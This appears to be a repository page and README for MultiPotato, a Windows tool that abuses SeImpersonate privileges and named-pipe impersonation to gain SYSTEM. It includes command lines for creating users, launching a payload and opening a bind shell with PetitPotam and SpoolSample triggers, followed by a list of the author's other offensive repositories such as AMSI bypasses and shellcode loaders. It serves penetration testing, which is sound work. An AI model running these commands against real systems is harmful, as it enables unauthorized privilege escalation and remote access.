• Stars
    star
    493
  • Rank 89,306 (Top 2 %)
  • Language
    C++
  • License
    GNU General Publi...
  • Created about 3 years ago
  • Updated about 3 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

MultiPotato

First of all - credit to @splinter_code & @decoder_it for RoguePotato as this code heavily bases on it.

This is just another Potato to get SYSTEM via SeImpersonate privileges. But this one is different in terms of

  • It doesn't contain any SYSTEM auth trigger for weaponization. Instead the code can be used to integrate your favorite trigger by yourself.
  • It's not only using CreateProcessWithTokenW to spawn a new process. Instead you can choose between CreateProcessWithTokenW, CreateProcessAsUserW, CreateUser and BindShell.

So this project is able to open up a NamedPipe Server, impersonates any user connecting to it and afterwards does one of the options mentioned above. If any new SYSTEM auth triggers are published in the future this tool can still be used to elevate privileges - you just need to use another Pipe-Name in this case.

Examples:

  1. CreateUser with modified PetitPotam trigger:
c:\temp\MultiPotato> MultiPotato.exe -t CreateUser

You have by default value 60 secconds (changable via THEAD_TIMEOUT) to let the SYSTEM account or any other account authenticate. This can be done for example via an unpatched MS-EFSRPC function. By default MultiPotato listens on the pipename \\.\pipe\pwned/pipe/srvsvc which is meant to be used in combination with MS-EFSRPC. For other SYSTEM auth triggers you can adjust this value via the -p parameter.

c:\temp\MultiPotato> PetitPotamModified.exe localhost/pipe/pwned localhost

Using PetitPotam.py as trigger from a remote system with a valid low privileged user is of course also possible.

alt text

  1. CreateProcessAsUserW with SpoolSample trigger:
c:\temp\MultiPotato> MultiPotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"

And trigger it via

c:\temp\MultiPotato>MS-RPRN.exe \\192.168.100.150 \\192.168.100.150/pipe/pwned

alt text

Important: In my testings for MS-RPRN I could not use localhost or 127.0.0.1 as target, this has to be the network IP-Adress or FQDN. In addition the Printer Service needs to be enabled for this to work.

  1. BindShell with SpoolSample PipeName
c:\temp\MultiPotato> MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"

alt text

alt text

Why??

I recently had a penetrationtest, where I was able to pwn a MSSQL Server via SQL-Injection and XP_CMDShell. But all public Potatoes failed on this target system to elevate privileges from service-account to SYSTEM. The System auth trigger was not the problem - instead CreateProcessWithTokenW failed all the time with NTSTATUS Code 5 - access forbidden. This didn't really makes sense for me and may be an edge case. One reason for that could be the local endpoint protection which may have blocked the process creation after impersonating SYSTEM.

Therefore I searched for alternatives - and asked some people on Twitter about it. Again Credit to @splinter_code for explaining me how to do it via CreateProcessAsUserW which worked fine on the pwned MSSQL server to get a SYSTEM C2-Callback.

More Repositories

1

WinPwn

Automation for internal Windows Penetrationtest / AD-Security
PowerShell
3,153
star
2

Pentest-Tools

2,063
star
3

Amsi-Bypass-Powershell

This repo contains some Amsi Bypass methods i found on different Blog Posts.
1,465
star
4

PowerSharpPack

PowerShell
1,380
star
5

OffensiveVBA

This repo covers some code execution and AV Evasion methods for Macros in Office documents
VBA
1,131
star
6

Creds

Some usefull Scripts and Executables for Pentest & Forensics
PowerShell
1,007
star
7

SharpImpersonation

A User Impersonation tool - via Token or Shellcode injection
C#
391
star
8

Invoke-SharpLoader

PowerShell
333
star
9

Caro-Kann

Encrypted shellcode Injection to avoid Kernel triggered memory scans
C
294
star
10

Ruy-Lopez

C
288
star
11

SharpNamedPipePTH

Pass the Hash to a named pipe for token Impersonation
C#
286
star
12

Nim-RunPE

A Nim implementation of reflective PE-Loading from memory
Nim
253
star
13

NimGetSyscallStub

Get fresh Syscalls from a fresh ntdll.dll copy
Nim
215
star
14

SharpVeeamDecryptor

Decrypt Veeam database passwords
C#
150
star
15

NamedPipePTH

Pass the Hash to a named pipe for token Impersonation
PowerShell
139
star
16

SyscallAmsiScanBufferBypass

AmsiScanBufferBypass using D/Invoke
C#
129
star
17

Nim_DInvoke

D/Invoke implementation in Nim
Nim
97
star
18

Excel-Phish

Phish password protected Excel-Files
VBA
93
star
19

Sharp-HackBrowserData

C# binary with embeded golang hack-browser-data
C#
93
star
20

Get-System-Techniques

PowerShell
85
star
21

NimShellcodeFluctuation

ShellcodeFluctuation PoC ported to Nim
Nim
74
star
22

RDPThiefInject

RDPThief donut shellcode inject into mstsc
C#
70
star
23

Invoke-Sharpcradle

Load C# Code straight to memory
PowerShell
54
star
24

Nim_CBT_Shellcode

CallBack-Techniques for Shellcode execution ported to Nim
Nim
53
star
25

LDAP-Signing-Scanner

A little scanner to check the LDAP Signing state
46
star
26

BitwardenDecryptBrute

Wordlist attacks on Bitwarden data.json files
Python
44
star
27

SharpOxidResolver

IOXIDResolver from AirBus Security/PingCastle
C#
40
star
28

SharpPolarBear

Privesc through import of Sheduled tasks + Hardlinks - CVE-2019-1069
C#
36
star
29

SharpByeBear

AppXSVC Service race condition - privilege escalation
C#
26
star
30

S3cur3Th1sSh1t

23
star
31

TeamViewerDecrypt

PowerShell
17
star
32

SharpLigolo

C# wrapper for ligolo
C#
16
star
33

Invoke-WMI-Information

Straight forward script for WMI information gathering (local or remote)
13
star
34

EmpEISDecrypt

Decrypt Matrix42 Empirum /EIS Passwords
C#
11
star
35

NimWinstaEveryoneAccess

Nim
10
star
36

darkamour_clone

Objective-C
9
star
37

WinFor

Powershell script to execute different forensic Powershell functions / tools on a compromised host
PowerShell
7
star
38

ssdp-poisoning

Python
7
star
39

MimiMisc

C
6
star
40

SSJI---JSGen

Just a copy from here: https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
Python
5
star
41

Hosts-File---AD-Tracking-Blocker

Hosts File for Blocking Advertising & Tracking Domains
3
star
42

nim-strenc

string encryption in Nim
Nim
2
star